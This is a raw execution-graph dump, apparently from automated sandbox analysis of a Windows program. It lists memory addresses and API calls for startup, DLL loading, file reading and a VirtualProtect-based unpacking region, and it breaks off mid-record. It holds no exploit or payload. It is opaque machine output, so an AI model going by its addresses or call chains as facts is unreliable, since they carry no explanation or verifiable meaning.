                                                              execution_graph 85495 7ff62664ccac 85516 7ff62664ce7c 85495->85516 85498 7ff62664cdf8 85665 7ff62664d19c 7 API calls 2 library calls 85498->85665 85499 7ff62664ccc8 __scrt_acquire_startup_lock 85501 7ff62664ce02 85499->85501 85504 7ff62664cce6 __scrt_release_startup_lock 85499->85504 85666 7ff62664d19c 7 API calls 2 library calls 85501->85666 85503 7ff62664cd0b 85504->85503 85506 7ff62664cd91 85504->85506 85662 7ff626659b9c 45 API calls 85504->85662 85505 7ff62664ce0d __GetCurrentState 85522 7ff62664d2e4 85506->85522 85508 7ff62664cd96 85525 7ff626641000 85508->85525 85513 7ff62664cdb9 85513->85505 85664 7ff62664d000 7 API calls 85513->85664 85515 7ff62664cdd0 85515->85503 85517 7ff62664ce84 85516->85517 85518 7ff62664ce90 __scrt_dllmain_crt_thread_attach 85517->85518 85519 7ff62664ccc0 85518->85519 85520 7ff62664ce9d 85518->85520 85519->85498 85519->85499 85520->85519 85667 7ff62664d8f8 7 API calls 2 library calls 85520->85667 85668 7ff62666a540 85522->85668 85524 7ff62664d2fb GetStartupInfoW 85524->85508 85526 7ff626641009 85525->85526 85670 7ff6266554f4 85526->85670 85528 7ff6266437fb 85677 7ff6266436b0 85528->85677 85535 7ff62664383c 85776 7ff626641c80 85535->85776 85536 7ff62664391b 85781 7ff6266445b0 85536->85781 85540 7ff62664385b 85749 7ff626648a20 85540->85749 85541 7ff62664396a 85804 7ff626642710 54 API calls _log10_special 85541->85804 85545 7ff62664388e 85552 7ff6266438bb __std_exception_copy 85545->85552 85780 7ff626648b90 40 API calls __std_exception_copy 85545->85780 85546 7ff62664395d 85547 7ff626643984 85546->85547 85548 7ff626643962 85546->85548 85551 7ff626641c80 49 API calls 85547->85551 85800 7ff6266500bc 85548->85800 85553 7ff6266439a3 85551->85553 85554 7ff626648a20 14 API calls 85552->85554 85562 7ff6266438de __std_exception_copy 85552->85562 85557 7ff626641950 115 API calls 85553->85557 85554->85562 85556 7ff626643a0b 85807 7ff626648b90 40 API calls __std_exception_copy 85556->85807 85559 7ff6266439ce 85557->85559 85559->85540 85561 7ff6266439de 85559->85561 85560 7ff626643a17 85808 7ff626648b90 40 API calls __std_exception_copy 85560->85808 85805 7ff626642710 54 API calls _log10_special 85561->85805 85567 7ff62664390e __std_exception_copy 85562->85567 85806 7ff626648b30 40 API calls __std_exception_copy 85562->85806 85565 7ff626643a23 85809 7ff626648b90 40 API calls __std_exception_copy 85565->85809 85568 7ff626648a20 14 API calls 85567->85568 85569 7ff626643a3b 85568->85569 85570 7ff626643b2f 85569->85570 85571 7ff626643a60 __std_exception_copy 85569->85571 85811 7ff626642710 54 API calls _log10_special 85570->85811 85579 7ff626643aab 85571->85579 85810 7ff626648b30 40 API calls __std_exception_copy 85571->85810 85573 7ff626643808 __std_exception_copy 85814 7ff62664c5c0 85573->85814 85575 7ff626648a20 14 API calls 85576 7ff626643bf4 __std_exception_copy 85575->85576 85577 7ff626643c46 85576->85577 85578 7ff626643d41 85576->85578 85580 7ff626643c50 85577->85580 85581 7ff626643cd4 85577->85581 85825 7ff6266444d0 49 API calls 85578->85825 85579->85575 85812 7ff6266490e0 59 API calls _log10_special 85580->85812 85584 7ff626648a20 14 API calls 85581->85584 85587 7ff626643ce0 85584->85587 85585 7ff626643d4f 85588 7ff626643d71 85585->85588 85589 7ff626643d65 85585->85589 85586 7ff626643c55 85591 7ff626643c61 85586->85591 85592 7ff626643cb3 85586->85592 85587->85591 85595 7ff626643ced 85587->85595 85590 7ff626641c80 49 API calls 85588->85590 85826 7ff626644620 85589->85826 85604 7ff626643d2b __std_exception_copy 85590->85604 85813 7ff626642710 54 API calls _log10_special 85591->85813 85823 7ff626648850 86 API calls 2 library calls 85592->85823 85599 7ff626641c80 49 API calls 85595->85599 85596 7ff626643dc4 85762 7ff626649400 85596->85762 85597 7ff626643cbb 85602 7ff626643cc8 85597->85602 85603 7ff626643cbf 85597->85603 85600 7ff626643d0b 85599->85600 85600->85604 85605 7ff626643d12 85600->85605 85602->85604 85603->85591 85604->85596 85606 7ff626643da7 SetDllDirectoryW LoadLibraryExW 85604->85606 85824 7ff626642710 54 API calls _log10_special 85605->85824 85606->85596 85607 7ff626643dd7 SetDllDirectoryW 85610 7ff626643e0a 85607->85610 85652 7ff626643e5a 85607->85652 85612 7ff626648a20 14 API calls 85610->85612 85611 7ff626643ffc 85614 7ff626644029 85611->85614 85615 7ff626644006 PostMessageW GetMessageW 85611->85615 85618 7ff626643e16 __std_exception_copy 85612->85618 85613 7ff626643f1b 85837 7ff6266433c0 121 API calls 2 library calls 85613->85837 85767 7ff626643360 85614->85767 85615->85614 85617 7ff626643f23 85617->85573 85619 7ff626643f2b 85617->85619 85621 7ff626643ef2 85618->85621 85625 7ff626643e4e 85618->85625 85838 7ff6266490c0 LocalFree 85619->85838 85836 7ff626648b30 40 API calls __std_exception_copy 85621->85836 85625->85652 85829 7ff626646db0 54 API calls memcpy_s 85625->85829 85628 7ff626644043 85840 7ff626646fb0 FreeLibrary 85628->85840 85634 7ff62664404f 85637 7ff626643e6c 85830 7ff626647330 117 API calls 2 library calls 85637->85830 85641 7ff626643e81 85643 7ff626643ea2 85641->85643 85655 7ff626643e85 85641->85655 85831 7ff626646df0 120 API calls _log10_special 85641->85831 85643->85655 85832 7ff6266471a0 125 API calls 85643->85832 85647 7ff626643eb7 85647->85655 85833 7ff6266474e0 55 API calls 85647->85833 85649 7ff626643ee0 85835 7ff626646fb0 FreeLibrary 85649->85835 85652->85611 85652->85613 85655->85652 85834 7ff626642a50 54 API calls _log10_special 85655->85834 85662->85506 85663 7ff62664d328 GetModuleHandleW 85663->85513 85664->85515 85665->85501 85666->85505 85667->85519 85669 7ff62666a530 85668->85669 85669->85524 85669->85669 85673 7ff62665f4f0 85670->85673 85671 7ff62665f543 85841 7ff62665a884 37 API calls 2 library calls 85671->85841 85673->85671 85675 7ff62665f596 85673->85675 85674 7ff62665f56c 85674->85528 85842 7ff62665f3c8 71 API calls _fread_nolock 85675->85842 85843 7ff62664c8c0 85677->85843 85680 7ff6266436eb GetLastError 85850 7ff626642c50 51 API calls _log10_special 85680->85850 85681 7ff626643710 85845 7ff6266492f0 FindFirstFileExW 85681->85845 85685 7ff62664377d 85853 7ff6266494b0 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 85685->85853 85686 7ff626643723 85851 7ff626649370 CreateFileW GetFinalPathNameByHandleW CloseHandle 85686->85851 85688 7ff62664c5c0 _log10_special 8 API calls 85691 7ff6266437b5 85688->85691 85690 7ff62664378b 85697 7ff626643706 85690->85697 85854 7ff626642810 49 API calls _log10_special 85690->85854 85691->85573 85699 7ff626641950 85691->85699 85692 7ff626643730 85693 7ff62664374c __vcrt_FlsAlloc 85692->85693 85694 7ff626643734 85692->85694 85693->85685 85852 7ff626642810 49 API calls _log10_special 85694->85852 85697->85688 85698 7ff626643745 85698->85697 85700 7ff6266445b0 108 API calls 85699->85700 85701 7ff626641985 85700->85701 85702 7ff626641c43 85701->85702 85703 7ff626647f80 83 API calls 85701->85703 85704 7ff62664c5c0 _log10_special 8 API calls 85702->85704 85705 7ff6266419cb 85703->85705 85706 7ff626641c5e 85704->85706 85748 7ff626641a03 85705->85748 85855 7ff626650744 85705->85855 85706->85535 85706->85536 85708 7ff6266500bc 74 API calls 85708->85702 85709 7ff6266419e5 85710 7ff6266419e9 85709->85710 85711 7ff626641a08 85709->85711 85862 7ff626654f78 11 API calls memcpy_s 85710->85862 85859 7ff62665040c 85711->85859 85714 7ff6266419ee 85863 7ff626642910 54 API calls _log10_special 85714->85863 85717 7ff626641a26 85864 7ff626654f78 11 API calls memcpy_s 85717->85864 85718 7ff626641a45 85722 7ff626641a5c 85718->85722 85723 7ff626641a7b 85718->85723 85720 7ff626641a2b 85865 7ff626642910 54 API calls _log10_special 85720->85865 85866 7ff626654f78 11 API calls memcpy_s 85722->85866 85725 7ff626641c80 49 API calls 85723->85725 85727 7ff626641a92 85725->85727 85726 7ff626641a61 85867 7ff626642910 54 API calls _log10_special 85726->85867 85729 7ff626641c80 49 API calls 85727->85729 85730 7ff626641add 85729->85730 85731 7ff626650744 73 API calls 85730->85731 85732 7ff626641b01 85731->85732 85733 7ff626641b16 85732->85733 85734 7ff626641b35 85732->85734 85868 7ff626654f78 11 API calls memcpy_s 85733->85868 85736 7ff62665040c _fread_nolock 53 API calls 85734->85736 85738 7ff626641b4a 85736->85738 85737 7ff626641b1b 85869 7ff626642910 54 API calls _log10_special 85737->85869 85740 7ff626641b50 85738->85740 85741 7ff626641b6f 85738->85741 85870 7ff626654f78 11 API calls memcpy_s 85740->85870 85872 7ff626650180 85741->85872 85745 7ff626641b55 85871 7ff626642910 54 API calls _log10_special 85745->85871 85748->85708 85750 7ff626648a2a 85749->85750 85751 7ff626649400 2 API calls 85750->85751 85752 7ff626648a49 GetEnvironmentVariableW 85751->85752 85753 7ff626648a66 ExpandEnvironmentStringsW 85752->85753 85754 7ff626648ab2 85752->85754 85753->85754 85756 7ff626648a88 85753->85756 85755 7ff62664c5c0 _log10_special 8 API calls 85754->85755 85757 7ff626648ac4 85755->85757 85910 7ff6266494b0 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 85756->85910 85757->85545 85759 7ff626648a9a 85760 7ff62664c5c0 _log10_special 8 API calls 85759->85760 85761 7ff626648aaa 85760->85761 85761->85545 85763 7ff626649422 MultiByteToWideChar 85762->85763 85766 7ff626649446 85762->85766 85765 7ff62664945c __std_exception_copy 85763->85765 85763->85766 85764 7ff626649463 MultiByteToWideChar 85764->85765 85765->85607 85766->85764 85766->85765 85911 7ff626646350 85767->85911 85770 7ff626643399 85839 7ff626643670 FreeLibrary 85770->85839 85772 7ff626643381 85772->85770 85979 7ff626646040 85772->85979 85774 7ff62664338d 85774->85770 85988 7ff6266461d0 54 API calls 85774->85988 85777 7ff626641ca5 85776->85777 86127 7ff6266549f4 85777->86127 85780->85552 85782 7ff6266445bc 85781->85782 85783 7ff626649400 2 API calls 85782->85783 85784 7ff6266445e4 85783->85784 85785 7ff626649400 2 API calls 85784->85785 85786 7ff6266445f7 85785->85786 86154 7ff626656004 85786->86154 85789 7ff62664c5c0 _log10_special 8 API calls 85790 7ff62664392b 85789->85790 85790->85541 85791 7ff626647f80 85790->85791 85792 7ff626647fa4 85791->85792 85793 7ff62664807b __std_exception_copy 85792->85793 85794 7ff626650744 73 API calls 85792->85794 85793->85546 85795 7ff626647fc0 85794->85795 85795->85793 86322 7ff626657938 85795->86322 85797 7ff626647fd5 85797->85793 85798 7ff626650744 73 API calls 85797->85798 85799 7ff62665040c _fread_nolock 53 API calls 85797->85799 85798->85797 85799->85797 85801 7ff6266500ec 85800->85801 86338 7ff62664fe98 85801->86338 85803 7ff626650105 85803->85541 85804->85573 85805->85573 85806->85556 85807->85560 85808->85565 85809->85567 85810->85579 85811->85573 85812->85586 85813->85573 85815 7ff62664c5c9 85814->85815 85816 7ff62664c950 IsProcessorFeaturePresent 85815->85816 85817 7ff626643ca7 85815->85817 85818 7ff62664c968 85816->85818 85817->85663 86350 7ff62664cb48 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85818->86350 85820 7ff62664c97b 86351 7ff62664c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 85820->86351 85823->85597 85824->85573 85825->85585 85827 7ff626641c80 49 API calls 85826->85827 85828 7ff626644650 85827->85828 85828->85604 85828->85828 85829->85637 85830->85641 85831->85643 85832->85647 85833->85655 85834->85649 85835->85652 85836->85652 85837->85617 85839->85628 85840->85634 85841->85674 85842->85674 85844 7ff6266436bc GetModuleFileNameW 85843->85844 85844->85680 85844->85681 85846 7ff62664932f FindClose 85845->85846 85847 7ff626649342 85845->85847 85846->85847 85848 7ff62664c5c0 _log10_special 8 API calls 85847->85848 85849 7ff62664371a 85848->85849 85849->85685 85849->85686 85850->85697 85851->85692 85852->85698 85853->85690 85854->85697 85856 7ff626650774 85855->85856 85879 7ff6266504d4 85856->85879 85858 7ff62665078d 85858->85709 85892 7ff62665042c 85859->85892 85862->85714 85863->85748 85864->85720 85865->85748 85866->85726 85867->85748 85868->85737 85869->85748 85870->85745 85871->85748 85873 7ff626650189 85872->85873 85874 7ff626641b89 85872->85874 85908 7ff626654f78 11 API calls memcpy_s 85873->85908 85874->85748 85878 7ff626642710 54 API calls _log10_special 85874->85878 85876 7ff62665018e 85909 7ff62665a950 37 API calls _invalid_parameter_noinfo 85876->85909 85878->85748 85880 7ff62665053e 85879->85880 85881 7ff6266504fe 85879->85881 85880->85881 85883 7ff62665054a 85880->85883 85891 7ff62665a884 37 API calls 2 library calls 85881->85891 85890 7ff6266554dc EnterCriticalSection 85883->85890 85884 7ff626650525 85884->85858 85886 7ff62665054f 85887 7ff626650658 71 API calls 85886->85887 85888 7ff626650561 85887->85888 85889 7ff6266554e8 _fread_nolock LeaveCriticalSection 85888->85889 85889->85884 85891->85884 85893 7ff626650456 85892->85893 85904 7ff626641a20 85892->85904 85894 7ff6266504a2 85893->85894 85895 7ff626650465 memcpy_s 85893->85895 85893->85904 85905 7ff6266554dc EnterCriticalSection 85894->85905 85906 7ff626654f78 11 API calls memcpy_s 85895->85906 85898 7ff6266504aa 85900 7ff6266501ac _fread_nolock 51 API calls 85898->85900 85899 7ff62665047a 85907 7ff62665a950 37 API calls _invalid_parameter_noinfo 85899->85907 85902 7ff6266504c1 85900->85902 85903 7ff6266554e8 _fread_nolock LeaveCriticalSection 85902->85903 85903->85904 85904->85717 85904->85718 85906->85899 85907->85904 85908->85876 85909->85874 85910->85759 85912 7ff626646365 85911->85912 85913 7ff626641c80 49 API calls 85912->85913 85914 7ff6266463a1 85913->85914 85915 7ff6266463cd 85914->85915 85916 7ff6266463aa 85914->85916 85918 7ff626644620 49 API calls 85915->85918 85999 7ff626642710 54 API calls _log10_special 85916->85999 85920 7ff6266463e5 85918->85920 85919 7ff6266463c3 85922 7ff62664c5c0 _log10_special 8 API calls 85919->85922 85921 7ff626646403 85920->85921 86000 7ff626642710 54 API calls _log10_special 85920->86000 85989 7ff626644550 85921->85989 85925 7ff62664336e 85922->85925 85925->85770 85942 7ff6266464f0 85925->85942 85927 7ff62664641b 85928 7ff626644620 49 API calls 85927->85928 85930 7ff626646434 85928->85930 85929 7ff626649070 3 API calls 85929->85927 85931 7ff626646459 85930->85931 85932 7ff626646439 85930->85932 85995 7ff626649070 85931->85995 86001 7ff626642710 54 API calls _log10_special 85932->86001 85935 7ff626646466 85936 7ff6266464b1 85935->85936 85937 7ff626646472 85935->85937 86003 7ff626645820 137 API calls 85936->86003 85938 7ff626649400 2 API calls 85937->85938 85940 7ff62664648a GetLastError 85938->85940 86002 7ff626642c50 51 API calls _log10_special 85940->86002 86004 7ff6266453f0 85942->86004 85944 7ff626646516 85945 7ff62664652f 85944->85945 85946 7ff62664651e 85944->85946 86011 7ff626644c80 85945->86011 86029 7ff626642710 54 API calls _log10_special 85946->86029 85950 7ff62664654c 85954 7ff62664655c 85950->85954 85956 7ff62664656d 85950->85956 85951 7ff62664653b 86030 7ff626642710 54 API calls _log10_special 85951->86030 85953 7ff62664652a 85953->85772 86031 7ff626642710 54 API calls _log10_special 85954->86031 85957 7ff62664659d 85956->85957 85958 7ff62664658c 85956->85958 85960 7ff6266465bd 85957->85960 85961 7ff6266465ac 85957->85961 86032 7ff626642710 54 API calls _log10_special 85958->86032 86015 7ff626644d40 85960->86015 86033 7ff626642710 54 API calls _log10_special 85961->86033 85965 7ff6266465dd 85968 7ff6266465fd 85965->85968 85969 7ff6266465ec 85965->85969 85966 7ff6266465cc 86034 7ff626642710 54 API calls _log10_special 85966->86034 85971 7ff62664660f 85968->85971 85973 7ff626646620 85968->85973 86035 7ff626642710 54 API calls _log10_special 85969->86035 86036 7ff626642710 54 API calls _log10_special 85971->86036 85976 7ff62664664a 85973->85976 86037 7ff626657320 73 API calls 85973->86037 85975 7ff626646638 86038 7ff626657320 73 API calls 85975->86038 85976->85953 86039 7ff626642710 54 API calls _log10_special 85976->86039 85980 7ff626646060 85979->85980 85980->85980 85981 7ff626646089 85980->85981 85987 7ff6266460a0 __std_exception_copy 85980->85987 86071 7ff626642710 54 API calls _log10_special 85981->86071 85983 7ff626646095 85983->85774 85984 7ff6266461ab 85984->85774 85986 7ff626642710 54 API calls 85986->85987 85987->85984 85987->85986 86041 7ff626641470 85987->86041 85988->85770 85990 7ff62664455a 85989->85990 85991 7ff626649400 2 API calls 85990->85991 85992 7ff62664457f 85991->85992 85993 7ff62664c5c0 _log10_special 8 API calls 85992->85993 85994 7ff6266445a7 85993->85994 85994->85927 85994->85929 85996 7ff626649400 2 API calls 85995->85996 85997 7ff626649084 LoadLibraryExW 85996->85997 85998 7ff6266490a3 __std_exception_copy 85997->85998 85998->85935 85999->85919 86000->85921 86001->85919 86002->85919 86003->85919 86006 7ff62664541c 86004->86006 86005 7ff626645424 86005->85944 86006->86005 86009 7ff6266455c4 86006->86009 86040 7ff626656b14 48 API calls 86006->86040 86007 7ff626645787 __std_exception_copy 86007->85944 86008 7ff6266447c0 47 API calls 86008->86009 86009->86007 86009->86008 86012 7ff626644cb0 86011->86012 86013 7ff62664c5c0 _log10_special 8 API calls 86012->86013 86014 7ff626644d1a 86013->86014 86014->85950 86014->85951 86016 7ff626644d55 86015->86016 86017 7ff626641c80 49 API calls 86016->86017 86018 7ff626644da1 86017->86018 86019 7ff626644e23 __std_exception_copy 86018->86019 86020 7ff626641c80 49 API calls 86018->86020 86021 7ff62664c5c0 _log10_special 8 API calls 86019->86021 86023 7ff626644de0 86020->86023 86022 7ff626644e6e 86021->86022 86022->85965 86022->85966 86023->86019 86024 7ff626649400 2 API calls 86023->86024 86025 7ff626644df6 86024->86025 86026 7ff626649400 2 API calls 86025->86026 86027 7ff626644e0d 86026->86027 86028 7ff626649400 2 API calls 86027->86028 86028->86019 86029->85953 86030->85953 86031->85953 86032->85953 86033->85953 86034->85953 86035->85953 86036->85953 86037->85975 86038->85976 86039->85953 86040->86006 86042 7ff6266445b0 108 API calls 86041->86042 86043 7ff626641493 86042->86043 86044 7ff6266414bc 86043->86044 86045 7ff62664149b 86043->86045 86047 7ff626650744 73 API calls 86044->86047 86094 7ff626642710 54 API calls _log10_special 86045->86094 86049 7ff6266414d1 86047->86049 86048 7ff6266414ab 86048->85987 86050 7ff6266414f8 86049->86050 86051 7ff6266414d5 86049->86051 86054 7ff626641508 86050->86054 86055 7ff626641532 86050->86055 86095 7ff626654f78 11 API calls memcpy_s 86051->86095 86053 7ff6266414da 86096 7ff626642910 54 API calls _log10_special 86053->86096 86097 7ff626654f78 11 API calls memcpy_s 86054->86097 86058 7ff626641538 86055->86058 86067 7ff62664154b 86055->86067 86072 7ff626641210 86058->86072 86059 7ff6266414f3 __std_exception_copy 86063 7ff6266500bc 74 API calls 86059->86063 86060 7ff626641510 86098 7ff626642910 54 API calls _log10_special 86060->86098 86064 7ff6266415c4 86063->86064 86064->85987 86065 7ff62665040c _fread_nolock 53 API calls 86065->86067 86066 7ff6266415d6 86099 7ff626654f78 11 API calls memcpy_s 86066->86099 86067->86059 86067->86065 86067->86066 86069 7ff6266415db 86100 7ff626642910 54 API calls _log10_special 86069->86100 86071->85983 86073 7ff626641268 86072->86073 86074 7ff626641297 86073->86074 86075 7ff62664126f 86073->86075 86078 7ff6266412b1 86074->86078 86079 7ff6266412d4 86074->86079 86105 7ff626642710 54 API calls _log10_special 86075->86105 86077 7ff626641282 86077->86059 86106 7ff626654f78 11 API calls memcpy_s 86078->86106 86083 7ff6266412e6 86079->86083 86092 7ff626641309 memcpy_s 86079->86092 86081 7ff6266412b6 86107 7ff626642910 54 API calls _log10_special 86081->86107 86108 7ff626654f78 11 API calls memcpy_s 86083->86108 86085 7ff62665040c _fread_nolock 53 API calls 86085->86092 86086 7ff6266412eb 86109 7ff626642910 54 API calls _log10_special 86086->86109 86088 7ff6266412cf __std_exception_copy 86088->86059 86089 7ff6266413cf 86110 7ff626642710 54 API calls _log10_special 86089->86110 86092->86085 86092->86088 86092->86089 86093 7ff626650180 37 API calls 86092->86093 86101 7ff626650b4c 86092->86101 86093->86092 86094->86048 86095->86053 86096->86059 86097->86060 86098->86059 86099->86069 86100->86059 86102 7ff626650b7c 86101->86102 86111 7ff62665089c 86102->86111 86104 7ff626650b9a 86104->86092 86105->86077 86106->86081 86107->86088 86108->86086 86109->86088 86110->86088 86112 7ff6266508bc 86111->86112 86113 7ff6266508e9 86111->86113 86112->86113 86114 7ff6266508c6 86112->86114 86115 7ff6266508f1 86112->86115 86113->86104 86125 7ff62665a884 37 API calls 2 library calls 86114->86125 86118 7ff6266507dc 86115->86118 86126 7ff6266554dc EnterCriticalSection 86118->86126 86120 7ff6266507f9 86121 7ff62665081c 74 API calls 86120->86121 86122 7ff626650802 86121->86122 86123 7ff6266554e8 _fread_nolock LeaveCriticalSection 86122->86123 86124 7ff62665080d 86123->86124 86124->86113 86125->86113 86130 7ff626654a4e 86127->86130 86128 7ff626654a73 86145 7ff62665a884 37 API calls 2 library calls 86128->86145 86130->86128 86131 7ff626654aaf 86130->86131 86146 7ff626652c80 49 API calls _invalid_parameter_noinfo 86131->86146 86133 7ff626654a9d 86135 7ff62664c5c0 _log10_special 8 API calls 86133->86135 86134 7ff626654b8c 86136 7ff62665a9b8 __free_lconv_mon 11 API calls 86134->86136 86137 7ff626641cc8 86135->86137 86136->86133 86137->85540 86138 7ff626654b46 86138->86134 86139 7ff626654bb0 86138->86139 86140 7ff626654b61 86138->86140 86143 7ff626654b58 86138->86143 86139->86134 86141 7ff626654bba 86139->86141 86147 7ff62665a9b8 86140->86147 86144 7ff62665a9b8 __free_lconv_mon 11 API calls 86141->86144 86143->86134 86143->86140 86144->86133 86145->86133 86146->86138 86148 7ff62665a9bd RtlFreeHeap 86147->86148 86152 7ff62665a9ec 86147->86152 86149 7ff62665a9d8 GetLastError 86148->86149 86148->86152 86150 7ff62665a9e5 __free_lconv_mon 86149->86150 86153 7ff626654f78 11 API calls memcpy_s 86150->86153 86152->86133 86153->86152 86155 7ff626655f38 86154->86155 86156 7ff626655f5e 86155->86156 86159 7ff626655f91 86155->86159 86185 7ff626654f78 11 API calls memcpy_s 86156->86185 86158 7ff626655f63 86186 7ff62665a950 37 API calls _invalid_parameter_noinfo 86158->86186 86161 7ff626655f97 86159->86161 86162 7ff626655fa4 86159->86162 86187 7ff626654f78 11 API calls memcpy_s 86161->86187 86173 7ff62665ac98 86162->86173 86165 7ff626644606 86165->85789 86167 7ff626655fb8 86188 7ff626654f78 11 API calls memcpy_s 86167->86188 86168 7ff626655fc5 86180 7ff62665ff3c 86168->86180 86171 7ff626655fd8 86189 7ff6266554e8 LeaveCriticalSection 86171->86189 86190 7ff626660348 EnterCriticalSection 86173->86190 86175 7ff62665acaf 86176 7ff62665ad0c 19 API calls 86175->86176 86177 7ff62665acba 86176->86177 86178 7ff6266603a8 _isindst LeaveCriticalSection 86177->86178 86179 7ff626655fae 86178->86179 86179->86167 86179->86168 86191 7ff62665fc38 86180->86191 86183 7ff62665ff96 86183->86171 86185->86158 86186->86165 86187->86165 86188->86165 86196 7ff62665fc73 __vcrt_FlsAlloc 86191->86196 86192 7ff62665fe3a 86197 7ff62665fe43 86192->86197 86209 7ff626654f78 11 API calls memcpy_s 86192->86209 86194 7ff62665ff11 86210 7ff62665a950 37 API calls _invalid_parameter_noinfo 86194->86210 86196->86192 86206 7ff626657aac 51 API calls 3 library calls 86196->86206 86197->86183 86203 7ff626666dc4 86197->86203 86199 7ff62665fea5 86199->86192 86207 7ff626657aac 51 API calls 3 library calls 86199->86207 86201 7ff62665fec4 86201->86192 86208 7ff626657aac 51 API calls 3 library calls 86201->86208 86211 7ff6266663c4 86203->86211 86206->86199 86207->86201 86208->86192 86209->86194 86210->86197 86212 7ff6266663db 86211->86212 86213 7ff6266663f9 86211->86213 86265 7ff626654f78 11 API calls memcpy_s 86212->86265 86213->86212 86216 7ff626666415 86213->86216 86215 7ff6266663e0 86266 7ff62665a950 37 API calls _invalid_parameter_noinfo 86215->86266 86222 7ff6266669d4 86216->86222 86220 7ff6266663ec 86220->86183 86268 7ff626666708 86222->86268 86225 7ff626666a49 86300 7ff626654f58 11 API calls memcpy_s 86225->86300 86226 7ff626666a61 86288 7ff626658590 86226->86288 86240 7ff626666440 86240->86220 86267 7ff626658568 LeaveCriticalSection 86240->86267 86245 7ff626666a4e 86301 7ff626654f78 11 API calls memcpy_s 86245->86301 86265->86215 86266->86220 86269 7ff626666734 86268->86269 86276 7ff62666674e 86268->86276 86269->86276 86313 7ff626654f78 11 API calls memcpy_s 86269->86313 86271 7ff626666743 86314 7ff62665a950 37 API calls _invalid_parameter_noinfo 86271->86314 86273 7ff62666681d 86286 7ff62666687a 86273->86286 86319 7ff626659be8 37 API calls 2 library calls 86273->86319 86274 7ff6266667cc 86274->86273 86317 7ff626654f78 11 API calls memcpy_s 86274->86317 86276->86274 86315 7ff626654f78 11 API calls memcpy_s 86276->86315 86278 7ff626666876 86281 7ff6266668f8 86278->86281 86278->86286 86279 7ff626666812 86318 7ff62665a950 37 API calls _invalid_parameter_noinfo 86279->86318 86320 7ff62665a970 17 API calls _isindst 86281->86320 86283 7ff6266667c1 86316 7ff62665a950 37 API calls _invalid_parameter_noinfo 86283->86316 86286->86225 86286->86226 86321 7ff626660348 EnterCriticalSection 86288->86321 86300->86245 86301->86240 86313->86271 86314->86276 86315->86283 86316->86274 86317->86279 86318->86273 86319->86278 86323 7ff626657968 86322->86323 86326 7ff626657444 86323->86326 86325 7ff626657981 86325->85797 86327 7ff62665748e 86326->86327 86328 7ff62665745f 86326->86328 86336 7ff6266554dc EnterCriticalSection 86327->86336 86337 7ff62665a884 37 API calls 2 library calls 86328->86337 86331 7ff62665747f 86331->86325 86332 7ff626657493 86333 7ff6266574b0 38 API calls 86332->86333 86334 7ff62665749f 86333->86334 86335 7ff6266554e8 _fread_nolock LeaveCriticalSection 86334->86335 86335->86331 86337->86331 86339 7ff62664feb3 86338->86339 86340 7ff62664fee1 86338->86340 86349 7ff62665a884 37 API calls 2 library calls 86339->86349 86347 7ff62664fed3 86340->86347 86348 7ff6266554dc EnterCriticalSection 86340->86348 86343 7ff62664fef8 86344 7ff62664ff14 72 API calls 86343->86344 86345 7ff62664ff04 86344->86345 86346 7ff6266554e8 _fread_nolock LeaveCriticalSection 86345->86346 86346->86347 86347->85803 86349->86347 86350->85820 86365 7ffdf151f7d0 86366 7ffdf151f81c 86365->86366 86367 7ffdf151f82e 00007FFE1FFB5630 86366->86367 86370 7ffdf151f841 86366->86370 86367->86370 86369 7ffdf151fbf7 86371 7ffdf151f952 86369->86371 86381 7ffdf150bbe0 86369->86381 86370->86371 86373 7ffdf1516e60 86370->86373 86375 7ffdf1516eef 86373->86375 86374 7ffdf1516f9e 00007FFE103019A0 86376 7ffdf1517005 86374->86376 86375->86374 86375->86375 86377 7ffdf151717a 86375->86377 86376->86377 86387 7ffdf150e1f0 86376->86387 86377->86369 86378 7ffdf15174c5 00007FFE1FFB5630 86379 7ffdf15172ea 86378->86379 86379->86377 86379->86378 86384 7ffdf150bc0d 86381->86384 86382 7ffdf150bc84 ReadFile 86383 7ffdf150bd1a 86382->86383 86382->86384 86385 7ffdf150bd59 00007FFE103019A0 86383->86385 86386 7ffdf150bc24 86383->86386 86384->86382 86384->86383 86384->86386 86385->86386 86386->86371 86389 7ffdf150e23e 86387->86389 86390 7ffdf150e4b0 CreateFileW 86389->86390 86391 7ffdf150e405 00007FFE1FFB5630 86389->86391 86392 7ffdf150e65d 86389->86392 86393 7ffdf150b190 86389->86393 86390->86389 86391->86389 86392->86379 86394 7ffdf150b1ce 86393->86394 86395 7ffdf150b217 86394->86395 86396 7ffdf150b1eb 00007FFE103019A0 86394->86396 86395->86389 86396->86395 86476 7ff62664b88c 86477 7ff62664ab8a 86476->86477 86479 7ff62664ac06 86477->86479 86480 7ff62664be00 86477->86480 86481 7ff62664be23 86480->86481 86482 7ff62664be41 memcpy_s 86480->86482 86484 7ff62665d66c 86481->86484 86482->86479 86485 7ff62665d6b7 86484->86485 86489 7ff62665d67b memcpy_s 86484->86489 86492 7ff626654f78 11 API calls memcpy_s 86485->86492 86486 7ff62665d69e HeapAlloc 86488 7ff62665d6b5 86486->86488 86486->86489 86488->86482 86489->86485 86489->86486 86491 7ff626663600 EnterCriticalSection LeaveCriticalSection memcpy_s 86489->86491 86491->86489 86492->86488 86352 7ffdf1413230 86353 7ffdf1413248 86352->86353 86358 7ffdf1413dd1 86352->86358 86354 7ffdf1413cde LoadLibraryA 86353->86354 86357 7ffdf1413d39 VirtualProtect VirtualProtect 86353->86357 86355 7ffdf1413cf8 86354->86355 86355->86353 86359 7ffdf1413d17 GetProcAddress 86355->86359 86357->86358 86358->86358 86359->86355 86360 7ffdf1413d2e 86359->86360 86397 7ffdf1580a50 86399 7ffdf1580ace 86397->86399 86400 7ffdf1580a7c 86397->86400 86399->86400 86401 7ffdf1580520 00007FFE103019A0 86399->86401 86402 7ffdf15805e6 86401->86402 86404 7ffdf15806c2 86402->86404 86405 7ffdf1580170 ReadFile 00007FFE103019A0 00007FFE103019A0 00007FFE103019A0 00007FFE103019A0 86402->86405 86404->86399 86405->86404 86406 7ff626655698 86407 7ff6266556b2 86406->86407 86408 7ff6266556cf 86406->86408 86431 7ff626654f58 11 API calls memcpy_s 86407->86431 86408->86407 86410 7ff6266556e2 CreateFileW 86408->86410 86412 7ff62665574c 86410->86412 86413 7ff626655716 86410->86413 86411 7ff6266556b7 86432 7ff626654f78 11 API calls memcpy_s 86411->86432 86435 7ff626655c74 46 API calls 3 library calls 86412->86435 86434 